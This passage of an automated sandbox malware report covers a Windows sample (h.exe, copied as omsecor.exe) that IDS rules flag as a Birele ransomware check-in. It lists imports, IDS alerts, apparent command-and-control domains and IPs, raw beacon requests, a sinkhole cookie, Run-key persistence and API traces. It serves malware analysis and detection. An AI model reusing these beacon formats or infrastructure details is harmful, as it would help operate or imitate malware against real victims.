IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xf6a8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xe000	0x1b4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xcc18	0xce00	7d17b3af3ad18f4a94d7ab9fe07eac18	False	0.5967650182038835	data	6.6299319364593226	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xe000	0x2144	0x2200	74f4ab6d225e1f74a6f3100bfbf96df3	False	0.4476102941176471	data	4.463727229154835	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x11000	0x1712c	0x200	9159e4683d74ea27f29c3b096294f663	False	0.466796875	data	3.7016590486098133	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
WININET.dll	HttpSendRequestW, InternetConnectW, HttpOpenRequestW, InternetSetPerSiteCookieDecisionW, InternetOpenUrlW, InternetAttemptConnect, InternetOpenW, InternetReadFile, InternetClearAllPerSiteCookieDecisions, InternetCloseHandle, InternetQueryDataAvailable, InternetSetOptionW
SHLWAPI.dll	StrStrIW, PathMatchSpecW, PathCombineW, wvnsprintfW, StrStrIA, PathRemoveFileSpecW
KERNEL32.dll	TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, GetVersionExA, HeapReAlloc, RtlUnwind, WideCharToMultiByte, MultiByteToWideChar, HeapCreate, CopyFileW, CreateThread, WaitForMultipleObjects, GetTickCount, DeleteFileW, CreateProcessW, SetUnhandledExceptionFilter, ExitProcess, GetLastError, LoadLibraryW, GetProcAddress, Sleep, VirtualProtect, GetPrivateProfileIntW, ExpandEnvironmentStringsW, GetPrivateProfileStringW, FindFirstFileW, SetFilePointer, SetEndOfFile, GetVersionExW, HeapAlloc, SetWaitableTimer, SystemTimeToFileTime, CreateWaitableTimerW, FindNextFileW, HeapFree, ReadFile, GetModuleFileNameW, GetFileTime, WaitForSingleObject, GetTimeZoneInformation, CreateFileW, CloseHandle, GetFileSizeEx, VirtualFree, GetProcessHeap, GetCurrentDirectoryW, VirtualAlloc, VirtualQuery, GetSystemTime, GetFileSize, FindClose, WriteFile, GetLocalTime, GetModuleHandleW, GetCommandLineW
USER32.dll	GetWindowLongW, DispatchMessageW, GetForegroundWindow, CharLowerW, CreateWindowExW, FindWindowW, PeekMessageW, SetForegroundWindow, GetSystemMetrics, MessageBoxW, SetWindowPos, SetWindowLongW, SetParent
ADVAPI32.dll	RegOpenKeyExW, RegEnumKeyExW, RegQueryValueExW, RegSetValueExW, RegCreateKeyExW, RegCloseKey
SHELL32.dll	SHGetFolderPathW
ole32.dll	CoCreateInstance, OleInitialize, CoInitialize
OLEAUT32.dll	SysFreeString, VariantInit, SysAllocString, VariantClear

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
34.41.229.245192.168.2.780497092037771 01/23/24-13:39:19.732410	TCP	2037771	ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	80	49709	34.41.229.245	192.168.2.7
192.168.2.734.41.229.24549709802015786 01/23/24-13:39:19.422200	TCP	2015786	ET TROJAN Ransom.Win32.Birele.gsg Checkin	49709	80	192.168.2.7	34.41.229.245
192.168.2.7193.166.255.17149699802015786 01/23/24-13:38:35.744468	TCP	2015786	ET TROJAN Ransom.Win32.Birele.gsg Checkin	49699	80	192.168.2.7	193.166.255.171
192.168.2.764.225.91.7349713802015786 01/23/24-13:40:05.584888	TCP	2015786	ET TROJAN Ransom.Win32.Birele.gsg Checkin	49713	80	192.168.2.7	64.225.91.73
192.168.2.764.225.91.7349708802015786 01/23/24-13:39:18.638291	TCP	2015786	ET TROJAN Ransom.Win32.Birele.gsg Checkin	49708	80	192.168.2.7	64.225.91.73

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 23, 2024 13:38:35.521198988 CET	49699	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:38:35.743880987 CET	80	49699	193.166.255.171	192.168.2.7
Jan 23, 2024 13:38:35.744004011 CET	49699	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:38:35.744467974 CET	49699	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:38:35.966620922 CET	80	49699	193.166.255.171	192.168.2.7
Jan 23, 2024 13:38:35.966653109 CET	80	49699	193.166.255.171	192.168.2.7
Jan 23, 2024 13:38:36.080274105 CET	49700	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:38:37.093519926 CET	49700	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:38:39.109201908 CET	49700	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:38:43.109143972 CET	49700	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:38:51.109131098 CET	49700	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:38:57.126569033 CET	49707	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:38:58.140469074 CET	49707	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:00.140491962 CET	49707	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:04.140392065 CET	49707	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:12.140450954 CET	49707	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:18.480215073 CET	49708	80	192.168.2.7	64.225.91.73
Jan 23, 2024 13:39:18.637645006 CET	80	49708	64.225.91.73	192.168.2.7
Jan 23, 2024 13:39:18.637798071 CET	49708	80	192.168.2.7	64.225.91.73
Jan 23, 2024 13:39:18.638290882 CET	49708	80	192.168.2.7	64.225.91.73
Jan 23, 2024 13:39:18.795526981 CET	80	49708	64.225.91.73	192.168.2.7
Jan 23, 2024 13:39:18.797132015 CET	80	49708	64.225.91.73	192.168.2.7
Jan 23, 2024 13:39:18.797214031 CET	49708	80	192.168.2.7	64.225.91.73
Jan 23, 2024 13:39:19.096178055 CET	49709	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:39:19.411546946 CET	80	49709	34.41.229.245	192.168.2.7
Jan 23, 2024 13:39:19.412636995 CET	49709	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:39:19.422199965 CET	49709	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:39:19.707097054 CET	80	49709	34.41.229.245	192.168.2.7
Jan 23, 2024 13:39:19.732409954 CET	80	49709	34.41.229.245	192.168.2.7
Jan 23, 2024 13:39:19.732426882 CET	80	49709	34.41.229.245	192.168.2.7
Jan 23, 2024 13:39:19.732510090 CET	49709	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:39:19.855705976 CET	49709	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:39:20.095356941 CET	49708	80	192.168.2.7	64.225.91.73
Jan 23, 2024 13:39:20.161643028 CET	80	49709	34.41.229.245	192.168.2.7
Jan 23, 2024 13:39:22.676857948 CET	49710	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:23.688195944 CET	49710	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:25.687295914 CET	49710	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:29.687279940 CET	49710	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:37.687366009 CET	49710	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:44.240858078 CET	49712	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:45.249797106 CET	49712	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:47.265419006 CET	49712	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:51.265537977 CET	49712	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:59.281160116 CET	49712	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:40:05.426767111 CET	49713	80	192.168.2.7	64.225.91.73
Jan 23, 2024 13:40:05.584170103 CET	80	49713	64.225.91.73	192.168.2.7
Jan 23, 2024 13:40:05.584489107 CET	49713	80	192.168.2.7	64.225.91.73
Jan 23, 2024 13:40:05.584887981 CET	49713	80	192.168.2.7	64.225.91.73
Jan 23, 2024 13:40:05.742047071 CET	80	49713	64.225.91.73	192.168.2.7
Jan 23, 2024 13:40:05.743979931 CET	80	49713	64.225.91.73	192.168.2.7
Jan 23, 2024 13:40:05.744055986 CET	49713	80	192.168.2.7	64.225.91.73
Jan 23, 2024 13:40:05.865480900 CET	49714	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:40:06.874815941 CET	49714	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:40:07.206876040 CET	80	49714	34.41.229.245	192.168.2.7
Jan 23, 2024 13:40:07.207031965 CET	49714	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:40:07.207370043 CET	49714	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:40:10.202997923 CET	49714	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:40:13.203010082 CET	49714	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:40:19.204269886 CET	49714	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:40:31.218717098 CET	49714	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:40:39.407463074 CET	49714	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:40:39.519112110 CET	49715	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:40:40.515788078 CET	49715	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:40:42.515491962 CET	49715	80	192.168.2.7	193.166.255.171

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 23, 2024 13:38:35.330364943 CET	59097	53	192.168.2.7	1.1.1.1
Jan 23, 2024 13:38:35.480412960 CET	53	59097	1.1.1.1	192.168.2.7
Jan 23, 2024 13:39:18.270117998 CET	62557	53	192.168.2.7	1.1.1.1
Jan 23, 2024 13:39:18.478317976 CET	53	62557	1.1.1.1	192.168.2.7
Jan 23, 2024 13:39:18.910788059 CET	51504	53	192.168.2.7	1.1.1.1
Jan 23, 2024 13:39:19.094268084 CET	53	51504	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 23, 2024 13:38:35.330364943 CET	192.168.2.7	1.1.1.1	0xdfbf	Standard query (0)	lousta.net	A (IP address)	IN (0x0001)	false
Jan 23, 2024 13:39:18.270117998 CET	192.168.2.7	1.1.1.1	0x199b	Standard query (0)	mkkuei4kdsz.com	A (IP address)	IN (0x0001)	false
Jan 23, 2024 13:39:18.910788059 CET	192.168.2.7	1.1.1.1	0x2e38	Standard query (0)	ow5dirasuek.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 23, 2024 13:38:35.480412960 CET	1.1.1.1	192.168.2.7	0xdfbf	No error (0)	lousta.net	193.166.255.171	A (IP address)	IN (0x0001)	false
Jan 23, 2024 13:39:18.478317976 CET	1.1.1.1	192.168.2.7	0x199b	No error (0)	mkkuei4kdsz.com	64.225.91.73	A (IP address)	IN (0x0001)	false
Jan 23, 2024 13:39:19.094268084 CET	1.1.1.1	192.168.2.7	0x2e38	No error (0)	ow5dirasuek.com	34.41.229.245	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

lousta.net

mkkuei4kdsz.com

ow5dirasuek.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	193.166.255.171	80	1228	C:\Users\user\AppData\Roaming\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Jan 23, 2024 13:38:35.744467974 CET	186	OUT	GET /650/534.html HTTP/1.1 From: 133504871133179231 Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Ad98d3i64ead;d:785id3i55e09<a9858 Host: lousta.net Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49708	64.225.91.73	80	1228	C:\Users\user\AppData\Roaming\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Jan 23, 2024 13:39:18.638290882 CET	191	OUT	GET /470/855.html HTTP/1.1 From: 133504871133179231 Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Ad98d3i64ead;d:785id3i55e09<a9858 Host: mkkuei4kdsz.com Connection: Keep-Alive
Jan 23, 2024 13:39:18.797132015 CET	816	IN	HTTP/1.1 200 OK server: nginx/1.18.0 (Ubuntu) date: Tue, 23 Jan 2024 12:39:18 GMT content-type: text/html content-length: 593 last-modified: Wed, 22 Feb 2023 21:25:52 GMT etag: "63f68860-251" accept-ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 64 61 74 61 29 0a 20 20 20 20 20 20 20 20 2e 63 61 74 63 68 28 65 72 72 6f 72 20 3d 3e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 69 66 20 28 72 65 74 72 69 65 73 20 3e 20 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 72 69 65 73 2d 2d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 72 65 74 72 79 2c 20 69 6e 74 65 72 76 61 6c 29 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 45 72 72 6f 72 3a 20 22 2c 20 65 72 72 6f 72 29 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 29 28 29 3b 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49709	34.41.229.245	80	1228	C:\Users\user\AppData\Roaming\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Jan 23, 2024 13:39:19.422199965 CET	190	OUT	GET /92/650.html HTTP/1.1 From: 133504871133179231 Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Ad98d3i64ead;d:785id3i55e09<a9858 Host: ow5dirasuek.com Connection: Keep-Alive
Jan 23, 2024 13:39:19.732409954 CET	415	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Jan 2024 12:39:19 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=b24b739c084d2e122fe89cafcf37ac85\|81.181.57.74\|1706013559\|1706013559\|0\|1\|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=81.181.57.74; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49713	64.225.91.73	80	7740	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Jan 23, 2024 13:40:05.584887981 CET	191	OUT	GET /569/916.html HTTP/1.1 From: 133504915384329881 Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Abe6bgj8345d;83e8d;7::b;6d3i17i24 Host: mkkuei4kdsz.com Connection: Keep-Alive
Jan 23, 2024 13:40:05.743979931 CET	816	IN	HTTP/1.1 200 OK server: nginx/1.18.0 (Ubuntu) date: Tue, 23 Jan 2024 12:40:05 GMT content-type: text/html content-length: 593 last-modified: Wed, 22 Feb 2023 21:25:52 GMT etag: "63f68860-251" accept-ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 64 61 74 61 29 0a 20 20 20 20 20 20 20 20 2e 63 61 74 63 68 28 65 72 72 6f 72 20 3d 3e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 69 66 20 28 72 65 74 72 69 65 73 20 3e 20 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 72 69 65 73 2d 2d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 72 65 74 72 79 2c 20 69 6e 74 65 72 76 61 6c 29 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 45 72 72 6f 72 3a 20 22 2c 20 65 72 72 6f 72 29 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 29 28 29 3b 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49714	34.41.229.245	80	7740	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Jan 23, 2024 13:40:07.207370043 CET	298	OUT	GET /580/608.html HTTP/1.1 From: 133504915384329881 Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Abe6bgj8345d;83e8d;7::b;6d3i17i24 Host: ow5dirasuek.com Connection: Keep-Alive Cookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85\|81.181.57.74\|1706013559\|1706013559\|0\|1\|0
Jan 23, 2024 13:40:10.202997923 CET	298	OUT	GET /580/608.html HTTP/1.1 From: 133504915384329881 Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Abe6bgj8345d;83e8d;7::b;6d3i17i24 Host: ow5dirasuek.com Connection: Keep-Alive Cookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85\|81.181.57.74\|1706013559\|1706013559\|0\|1\|0
Jan 23, 2024 13:40:13.203010082 CET	298	OUT	GET /580/608.html HTTP/1.1 From: 133504915384329881 Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Abe6bgj8345d;83e8d;7::b;6d3i17i24 Host: ow5dirasuek.com Connection: Keep-Alive Cookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85\|81.181.57.74\|1706013559\|1706013559\|0\|1\|0
Jan 23, 2024 13:40:19.204269886 CET	298	OUT	GET /580/608.html HTTP/1.1 From: 133504915384329881 Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Abe6bgj8345d;83e8d;7::b;6d3i17i24 Host: ow5dirasuek.com Connection: Keep-Alive Cookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85\|81.181.57.74\|1706013559\|1706013559\|0\|1\|0
Jan 23, 2024 13:40:31.218717098 CET	298	OUT	GET /580/608.html HTTP/1.1 From: 133504915384329881 Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Abe6bgj8345d;83e8d;7::b;6d3i17i24 Host: ow5dirasuek.com Connection: Keep-Alive Cookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85\|81.181.57.74\|1706013559\|1706013559\|0\|1\|0

Target ID:	0
Start time:	13:38:33
Start date:	23/01/2024
Path:	C:\Users\user\Desktop\h.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\h.exe
Imagebase:	0x400000
File size:	83'656 bytes
MD5 hash:	564451E54FA0196ACD2FD7F771E5ED1C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:38:33
Start date:	23/01/2024
Path:	C:\Users\user\AppData\Roaming\omsecor.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\omsecor.exe
Imagebase:	0x400000
File size:	83'656 bytes
MD5 hash:	77F1965059059CE58EC10CCA09F566D1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	14:52:18
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\omsecor.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\omsecor.exe
Imagebase:	0x400000
File size:	83'656 bytes
MD5 hash:	5A37340FA852E5184BBBA4134E60B591
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.9%
Total number of Nodes:	1144
Total number of Limit Nodes:	6

Executed Functions

Function 004075D4 Relevance: 22.6, APIs: 15, Instructions: 128
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
GetFileSize.KERNEL32(?,00000000), ref: 0040762E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
RtlAllocateHeap.NTDLL(00000000), ref: 0040763F
ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 00407660
WriteFile.KERNELBASE(?,?,00000000,?,00000000), ref: 0040767F
SetFilePointer.KERNELBASE(?,00000000,00000000,00000000), ref: 00407691
ReadFile.KERNELBASE(?,?,00000040,?,00000000), ref: 004076A1
SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076AF
ReadFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 004076C5
SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076EF
WriteFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 00407705
FindCloseChangeNotification.KERNELBASE(?), ref: 00407714
CloseHandle.KERNEL32(?), ref: 00407719

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: File$PointerRead$CloseCreateHeapWrite$AllocateChangeFindHandleNotificationProcessSize
String ID:
API String ID: 3476270553-0
Opcode ID: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
Opcode Fuzzy Hash: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040ABD9 Relevance: 3.0, APIs: 2, Instructions: 26
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72

FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
FindClose.KERNEL32(00000000), ref: 0040AC0F

Memory Dump Source

Source File: 00000000.00000002.1211056881.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1211037427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211075609.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1211096667.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h.jbxd

Similarity

API ID: FindOpen$CloseFileFirst
String ID:
API String ID: 3155378417-0
Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
